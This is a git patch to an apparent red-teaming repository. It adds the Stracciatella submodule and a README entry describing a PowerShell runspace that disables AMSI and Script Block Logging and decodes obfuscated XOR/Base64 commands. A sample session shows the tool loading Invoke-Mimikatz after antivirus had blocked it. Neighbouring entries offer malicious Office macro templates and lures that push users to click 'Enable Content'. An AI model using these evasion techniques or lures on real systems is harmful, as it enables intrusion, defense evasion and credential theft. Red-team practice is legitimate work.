From f92bc1a10b8adfeb4a04e1256e50b79dc3b9b7ce Mon Sep 17 00:00:00 2001 From: mb Date: Wed, 26 Jun 2019 03:51:02 +0200 Subject: [PATCH] Added Stracciatella --- .gitmodules | 3 ++ red-teaming/README.md | 76 +++++++++++++++++++++++++++++++++++++++ red-teaming/Stracciatella | 1 + 3 files changed, 80 insertions(+) create mode 160000 red-teaming/Stracciatella diff --git a/.gitmodules b/.gitmodules index 00f600b..b981567 100644 --- a/.gitmodules +++ b/.gitmodules @@ -31,3 +31,6 @@ [submodule "web/proxy2"] path = web/proxy2 url = https://github.com/mgeeky/proxy2 +[submodule "red-teaming/Stracciatella"] + path = red-teaming/Stracciatella + url = https://github.com/mgeeky/Stracciatella.git diff --git a/red-teaming/README.md b/red-teaming/README.md index 93e49f0..0ba1aa7 100644 --- a/red-teaming/README.md +++ b/red-teaming/README.md @@ -277,6 +277,82 @@ PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree - **`set-handler.rc`** - Quickly set metasploit's multi-handler + web_delivery (separated) handler for use with powershell. ([gist](https://gist.github.com/mgeeky/bf4d732aa6e602ca9b77d089fd3ea7c9)) +- **`Stracciatella`** - Powershell runspace from within C# (aka `SharpPick` technique) with AMSI and Script Block Logging disabled for your pleasure. + + * This program provides functionality to decode passed parameters on the fly, using Base64 and Xor single-byte decode (also combined) + * Before launching any command, it makes sure to disable AMSI using two approaches + * Before launching any command, it makes sure to disable Script Block logging using two approaches + * This program does not patch any system library, system native code (think amsi.dll) + * Efforts were made to not store decoded script/commands excessively long, in order to protect itself from memory-dumping techniques governed by EDRs and AVs + * The resulting binary may be considered bit too large, that's because `Costura.Fody` NuGet package is used which bundles `System.Management.Automation.dll` within resulting assembly + + +``` +PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1 + + :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled. + Mariusz B. / mgeeky, '19 + +[.] Will load script file: '.\Test2.ps1' +[+] AMSI Disabled. +[+] Script Block Logging Disabled. +[.] Language Mode: FullLanguage + +PS> & '.\Test2.ps1' +PS> Write-Host "It works like a charm!" ; $ExecutionContext.SessionState.LanguageMode +[+] Yeeey, it really worked. +It works like a charm! +FullLanguage + +PS D:\> "amsiInitFailed" +At line:1 char:1 ++ "amsiInitFailed" ++ ~~~~~~~~~~~~~~~~ +This script contains malicious content and has been blocked by your antivirus software. + + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + + FullyQualifiedErrorId : ScriptContainedMaliciousContent + +PS D:\> . .\Invoke-Mimikatz.ps1 +At line:1 char:1 ++ . .\Invoke-Mimikatz.ps1 ++ ~~~~~~~~~~~~~~~~~~~~~~~ +This script contains malicious content and has been blocked by your antivirus software. + + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + + FullyQualifiedErrorId : ScriptContainedMaliciousContent + +PS D:\> .\Stracciatella.exe -v + + :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled. + Mariusz B. / mgeeky, '19 + +[-] It looks like no script path was given. +[+] AMSI Disabled. +[+] Script Block Logging Disabled. +[.] Language Mode: FullLanguage + +Stracciatella D:\> . .\Invoke-Mimikatz.ps1 + +Stracciatella D:\> Invoke-Mimikatz -Command "coffee ; exit" + + .#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14 + .## ^ ##. "A La Vie, A L'Amour" + ## / \ ## /* * * + ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) + '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) + '#####' with 20 modules * * */ + +mimikatz(powershell) # coffee + + ( ( + ) ) + .______. + | |] + \ / + `----' + +mimikatz(powershell) # ; +``` + - **`SubstitutePageMacro.vbs`** - This is a template for the Malicious Macros that would like to substitute primary contents of the document (like luring/fake warnings to "Enable Content") and replace document's contents with what is inside of an AutoText named `RealDoc` (configured via variable `autoTextTemplateName` ). ([gist](https://gist.github.com/mgeeky/3c705560c5041ab20c62f41e917616e6)) - **`warnings\EN-Word.docx`** and **`warnings\EN-Excel.docx`** - Set of ready-to-use Microsoft Office Word shapes that can be pasted / inserted into malicious documents for enticing user into clicking "Enable Editing" and "Enable Content" buttons. diff --git a/red-teaming/Stracciatella b/red-teaming/Stracciatella new file mode 160000 index 0000000..7255ecd --- /dev/null +++ b/red-teaming/Stracciatella @@ -0,0 +1 @@ +Subproject commit 7255ecd2f94f37e1fa04265a2fc33a0e418b6a14